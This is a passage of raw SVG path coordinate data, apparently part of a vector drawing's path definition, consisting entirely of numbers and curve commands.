.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2